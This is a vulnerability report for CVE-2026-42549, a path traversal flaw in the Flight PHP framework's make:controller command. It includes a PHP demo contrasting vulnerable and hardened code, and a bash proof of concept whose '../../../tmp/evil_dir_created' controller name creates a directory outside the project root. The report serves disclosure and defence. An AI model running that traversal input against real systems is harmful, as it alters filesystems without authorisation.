Security Vulnerability Report
CVE-2026-42549 CVSS 4.4 MEDIUM


Published: 2026-05-13 20:16:22
Last Modified: 2026-05-14 20:17:05
NVD Status: Deferred

Description

Flight is an extensible micro-framework for PHP. Prior to 3.18.1, the make:controller CLI command calls mkdir(..., recursive: true) on a path built from the user-supplied controller name, before Nette's class-name validation runs. The class-file write is correctly rejected by Nette when the name contains /, but the recursive directory creation side effect is already committed, including directories located outside the project root through ../ traversal. This vulnerability is fixed in 3.18.1.
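The ordering defect described above, reproduced in a scratch directory beside the corrected ordering. This is an added example, not Flight's code or the 3.18.1 fix; isValidClassName() stands in for Nette's validation, and the function names and the app/controllers layout are assumptions.

```php
<?php
// Added example (not Flight's code). Function names and the app/controllers layout are assumptions.

// Stand-in for Nette's class-name validation (assumption): a bare PHP identifier,
// which rules out '/', '\' and '..' before any path is built from the name.
function isValidClassName(string $name): bool
{
    return preg_match('/^[A-Za-z_][A-Za-z0-9_]*$/', $name) === 1;
}

// Vulnerable ordering: recursive mkdir on a path built from raw input, then validation.
function makeControllerVulnerable(string $root, string $name): void
{
    $file = "$root/app/controllers/{$name}Controller.php";
    $dir = dirname($file);                  // '..' segments are normalised by mkdir()
    is_dir($dir) || mkdir($dir, 0755, true); // side effect committed here
    if (!isValidClassName($name)) {         // too late: the directory already exists
        throw new InvalidArgumentException("invalid controller name: $name");
    }
    file_put_contents($file, "<?php\nclass {$name}Controller {}\n");
}

// Hardened ordering: reject bad input first, then touch the filesystem.
function makeControllerHardened(string $root, string $name): void
{
    if (!isValidClassName($name)) {
        throw new InvalidArgumentException("invalid controller name: $name");
    }
    $dir = "$root/app/controllers";         // fixed location, not derived from $name
    is_dir($dir) || mkdir($dir, 0755, true);
    // Defence in depth: the resolved target must stay inside the project root.
    $realRoot = realpath($root);
    if ($realRoot === false || !str_starts_with((string) realpath($dir), $realRoot . DIRECTORY_SEPARATOR)) {
        throw new RuntimeException('target directory escapes the project root');
    }
    file_put_contents("$dir/{$name}Controller.php", "<?php\nclass {$name}Controller {}\n");
}

// Demonstration confined to a scratch directory; nothing outside it is touched.
$scratch = sys_get_temp_dir() . '/flight-cve-demo-' . getmypid();
$root = "$scratch/project";
mkdir($root, 0755, true);
$name = '../../../outside/Escaped';        // resolves to $scratch/outside, beyond $root
foreach (['makeControllerVulnerable', 'makeControllerHardened'] as $fn) {
    try { $fn($root, $name); } catch (Throwable $e) { /* both reject the name */ }
    printf("%-24s stray directory created: %s\n", $fn, is_dir("$scratch/outside") ? 'yes' : 'no');
    @rmdir("$scratch/outside");
}
rmdir($root); rmdir($scratch);
```

Both functions throw on the same input; only the vulnerable one leaves a directory behind, which is exactly the gap between "validation rejected the write" and "no side effect happened".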

CVSS Details

CVSS Score
4.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L
Exploitability Score
1.8
Impact Score
2.5
Weakness
CWE-22 (Path Traversal)

Configurations (Affected Products)

No CPE configuration data available. Affected: Flight PHP Framework < 3.18.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```bash
#!/bin/bash
# PoC for CVE-2026-42549: Flight Framework Path Traversal via make:controller
# Description: Exploits the directory creation before validation to create
# directories outside the project root.

# Ensure you are in a directory where you have a Flight project initialized
cd /path/to/vulnerable/flight/project || exit 1

echo "Attempting to create directory outside project root..."

# The payload uses '../' to traverse up the directory tree.
# Even though the command will fail validation, the mkdir occurs first.
php flight make:controller ../../../tmp/evil_dir_created

echo "Check /tmp/ directory. A directory named 'evil_dir_created' should exist."

# Note: The exact command syntax depends on how the flight binary is set up,
# usually 'php flight make:controller'
```

References

https://github.com/flightphp/core/security/advisories/GHSA-3xjv-pmf2-gf2q (GitHub Security Advisory)